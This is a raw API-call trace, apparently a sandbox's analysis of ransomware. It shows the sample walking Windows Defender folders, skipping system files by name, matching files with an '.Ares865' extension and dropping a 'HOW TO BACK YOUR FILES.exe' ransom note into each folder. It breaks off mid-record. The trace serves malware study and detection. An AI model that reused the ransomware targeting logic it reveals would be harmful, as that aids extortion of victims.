[0090.584] lstrlenW (lpString="Updates") returned 7 [0090.584] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\Backup") returned 105 [0090.584] lstrcpyW (in: lpString1=0x2cce4c6, lpString2="Updates" | out: lpString1="Updates") returned="Updates" [0090.585] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b28 [0090.585] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xd6) returned 0x2d6cf0 [0090.585] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b30 | out: ListHead=0x2e7710, ListEntry=0x2e7b30) returned 0x2e7c10 [0090.585] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1fb3099, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x63b2f180, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x63b2f180, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", cAlternateFileName="{D2B0B~1")) returned 1 [0090.585] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.585] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="aoldtz.exe") returned -1 [0090.585] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2=".") returned 1 [0090.585] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="..") returned 1 [0090.585] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="windows") returned -1 [0090.585] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="bootmgr") returned -1 [0090.585] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="temp") returned -1 [0090.585] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="pagefile.sys") returned -1 [0090.585] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="boot") returned -1 [0090.585] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="ids.txt") returned -1 [0090.585] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="ntuser.dat") returned -1 [0090.585] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="perflogs") returned -1 [0090.585] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="MSBuild") returned -1 [0090.585] lstrlenW (lpString="{D2B0B133-42ED-44D3-809A-46EBB62BA863}") returned 38 [0090.585] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\Updates") returned 106 [0090.585] lstrcpyW (in: lpString1=0x2cce4c6, lpString2="{D2B0B133-42ED-44D3-809A-46EBB62BA863}" | out: lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}") returned="{D2B0B133-42ED-44D3-809A-46EBB62BA863}" [0090.585] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7be8 [0090.585] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x114) returned 0x2e0710 [0090.585] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bf0 | out: ListHead=0x2e7710, ListEntry=0x2e7bf0) returned 0x2e7b30 [0090.585] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1fb3099, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x63b2f180, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x63b2f180, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", cAlternateFileName="{D2B0B~1")) returned 0 [0090.585] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.585] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7bf0 [0090.585] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}" [0090.585] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e0710 | out: hHeap=0x2b0000) returned 1 [0090.585] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7be8 | out: hHeap=0x2b0000) returned 1 [0090.585] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}") returned 137 [0090.585] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}" [0090.585] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.585] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.586] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.586] GetLastError () returned 0x0 [0090.586] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.586] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.586] CloseHandle (hObject=0x120) returned 1 [0090.586] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.586] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.586] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1fb3099, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x63b2f180, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x63b2f180, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.586] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.587] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.587] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0090.587] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1fb3099, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x63b2f180, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x63b2f180, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.587] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.587] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0090.587] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0090.587] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0090.587] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c504f60, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c504f60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0090.587] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0090.587] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1fd91f9, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x1fd91f9, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x637c31e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xb17490, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mpasbase.vdm.Ares865", cAlternateFileName="")) returned 1 [0090.587] lstrcmpiW (lpString1="mpasbase.vdm.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.587] lstrcmpiW (lpString1="mpasbase.vdm.Ares865", lpString2="aoldtz.exe") returned 1 [0090.587] lstrcmpiW (lpString1="mpasbase.vdm.Ares865", lpString2=".") returned 1 [0090.587] lstrcmpiW (lpString1="mpasbase.vdm.Ares865", lpString2="..") returned 1 [0090.587] lstrcmpiW (lpString1="mpasbase.vdm.Ares865", lpString2="windows") returned -1 [0090.587] lstrcmpiW (lpString1="mpasbase.vdm.Ares865", lpString2="bootmgr") returned 1 [0090.587] lstrcmpiW (lpString1="mpasbase.vdm.Ares865", lpString2="temp") returned -1 [0090.587] lstrcmpiW (lpString1="mpasbase.vdm.Ares865", lpString2="pagefile.sys") returned -1 [0090.587] lstrcmpiW (lpString1="mpasbase.vdm.Ares865", lpString2="boot") returned 1 [0090.587] lstrcmpiW (lpString1="mpasbase.vdm.Ares865", lpString2="ids.txt") returned 1 [0090.587] lstrcmpiW (lpString1="mpasbase.vdm.Ares865", lpString2="ntuser.dat") returned -1 [0090.587] lstrcmpiW (lpString1="mpasbase.vdm.Ares865", lpString2="perflogs") returned -1 [0090.587] lstrcmpiW (lpString1="mpasbase.vdm.Ares865", lpString2="MSBuild") returned -1 [0090.587] lstrlenW (lpString="mpasbase.vdm.Ares865") returned 20 [0090.587] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\*") returned 139 [0090.587] lstrcpyW (in: lpString1=0x2cce514, lpString2="mpasbase.vdm.Ares865" | out: lpString1="mpasbase.vdm.Ares865") returned="mpasbase.vdm.Ares865" [0090.587] lstrlenW (lpString="mpasbase.vdm.Ares865") returned 20 [0090.587] lstrlenW (lpString="Ares865") returned 7 [0090.587] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.587] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1fff35a, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x1fff35a, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x63b09020, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x53090, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mpasdlta.vdm.Ares865", cAlternateFileName="")) returned 1 [0090.587] lstrcmpiW (lpString1="mpasdlta.vdm.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.587] lstrcmpiW (lpString1="mpasdlta.vdm.Ares865", lpString2="aoldtz.exe") returned 1 [0090.587] lstrcmpiW (lpString1="mpasdlta.vdm.Ares865", lpString2=".") returned 1 [0090.587] lstrcmpiW (lpString1="mpasdlta.vdm.Ares865", lpString2="..") returned 1 [0090.587] lstrcmpiW (lpString1="mpasdlta.vdm.Ares865", lpString2="windows") returned -1 [0090.587] lstrcmpiW (lpString1="mpasdlta.vdm.Ares865", lpString2="bootmgr") returned 1 [0090.587] lstrcmpiW (lpString1="mpasdlta.vdm.Ares865", lpString2="temp") returned -1 [0090.588] lstrcmpiW (lpString1="mpasdlta.vdm.Ares865", lpString2="pagefile.sys") returned -1 [0090.588] lstrcmpiW (lpString1="mpasdlta.vdm.Ares865", lpString2="boot") returned 1 [0090.588] lstrcmpiW (lpString1="mpasdlta.vdm.Ares865", lpString2="ids.txt") returned 1 [0090.588] lstrcmpiW (lpString1="mpasdlta.vdm.Ares865", lpString2="ntuser.dat") returned -1 [0090.588] lstrcmpiW (lpString1="mpasdlta.vdm.Ares865", lpString2="perflogs") returned -1 [0090.588] lstrcmpiW (lpString1="mpasdlta.vdm.Ares865", lpString2="MSBuild") returned -1 [0090.588] lstrlenW (lpString="mpasdlta.vdm.Ares865") returned 20 [0090.588] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasbase.vdm.Ares865") returned 158 [0090.588] lstrcpyW (in: lpString1=0x2cce514, lpString2="mpasdlta.vdm.Ares865" | out: lpString1="mpasdlta.vdm.Ares865") returned="mpasdlta.vdm.Ares865" [0090.588] lstrlenW (lpString="mpasdlta.vdm.Ares865") returned 20 [0090.588] lstrlenW (lpString="Ares865") returned 7 [0090.588] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.588] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1fb3099, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x1fb3099, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x63b552e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x7d2050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mpengine.dll.Ares865", cAlternateFileName="")) returned 1 [0090.588] lstrcmpiW (lpString1="mpengine.dll.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.588] lstrcmpiW (lpString1="mpengine.dll.Ares865", lpString2="aoldtz.exe") returned 1 [0090.588] lstrcmpiW (lpString1="mpengine.dll.Ares865", lpString2=".") returned 1 [0090.588] lstrcmpiW (lpString1="mpengine.dll.Ares865", lpString2="..") returned 1 [0090.588] lstrcmpiW (lpString1="mpengine.dll.Ares865", lpString2="windows") returned -1 [0090.588] lstrcmpiW (lpString1="mpengine.dll.Ares865", lpString2="bootmgr") returned 1 [0090.588] lstrcmpiW (lpString1="mpengine.dll.Ares865", lpString2="temp") returned -1 [0090.588] lstrcmpiW (lpString1="mpengine.dll.Ares865", lpString2="pagefile.sys") returned -1 [0090.588] lstrcmpiW (lpString1="mpengine.dll.Ares865", lpString2="boot") returned 1 [0090.588] lstrcmpiW (lpString1="mpengine.dll.Ares865", lpString2="ids.txt") returned 1 [0090.588] lstrcmpiW (lpString1="mpengine.dll.Ares865", lpString2="ntuser.dat") returned -1 [0090.588] lstrcmpiW (lpString1="mpengine.dll.Ares865", lpString2="perflogs") returned -1 [0090.588] lstrcmpiW (lpString1="mpengine.dll.Ares865", lpString2="MSBuild") returned -1 [0090.588] lstrlenW (lpString="mpengine.dll.Ares865") returned 20 [0090.588] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasdlta.vdm.Ares865") returned 158 [0090.588] lstrcpyW (in: lpString1=0x2cce514, lpString2="mpengine.dll.Ares865" | out: lpString1="mpengine.dll.Ares865") returned="mpengine.dll.Ares865" [0090.588] lstrlenW (lpString="mpengine.dll.Ares865") returned 20 [0090.588] lstrlenW (lpString="Ares865") returned 7 [0090.588] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.588] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1fb3099, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x1fb3099, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x63b552e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x7d2050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mpengine.dll.Ares865", cAlternateFileName="")) returned 0 [0090.588] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.588] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b30 [0090.588] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\Updates", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\Updates") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\Updates" [0090.589] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d6cf0 | out: hHeap=0x2b0000) returned 1 [0090.589] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b28 | out: hHeap=0x2b0000) returned 1 [0090.589] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\Updates") returned 106 [0090.589] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\Updates" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\Updates") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\Updates" [0090.589] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.589] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\windows defender\\definition updates\\updates\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.589] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.589] GetLastError () returned 0x0 [0090.589] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.589] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.589] CloseHandle (hObject=0x120) returned 1 [0090.590] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.590] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.590] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c504f60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c504f60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.590] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.590] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.590] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0090.590] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c504f60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c504f60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.590] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.590] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0090.590] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0090.590] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0090.590] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c504f60, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c504f60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0090.590] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0090.590] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c504f60, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c504f60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0090.590] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.590] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c10 [0090.590] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\Backup", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\Backup") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\Backup" [0090.590] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e87c0 | out: hHeap=0x2b0000) returned 1 [0090.590] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c08 | out: hHeap=0x2b0000) returned 1 [0090.590] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\Backup") returned 105 [0090.590] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\Backup" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\Backup") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\Backup" [0090.590] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.590] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\windows defender\\definition updates\\backup\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.591] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.591] GetLastError () returned 0x0 [0090.591] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.591] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.591] CloseHandle (hObject=0x120) returned 1 [0090.591] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.591] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.591] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, 